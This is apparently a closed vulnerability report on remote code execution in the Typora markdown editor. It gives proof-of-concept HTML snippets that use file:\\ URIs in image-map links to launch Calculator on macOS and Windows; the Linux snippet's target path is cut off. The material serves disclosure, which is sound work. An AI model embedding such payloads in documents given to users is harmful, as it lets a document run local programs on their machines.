Closed
Description
Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability
Description:
Typora fails to sanitize input on HTML attributes. Abusing the file:\\ URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora (MacOS, Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability (PoC.zip).
Tested On: MacOS 10.14.2, Ubuntu 18.04, Windows 10
Proof of Concepts:
MacOS:
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\Applications\Calculator.app">
</map>
</body>
</html>
Windows:
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file://C|Windows/System32/calc.exe">
</map>
</body>
</html>
Linux:
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\">
</map>
</body>
</html>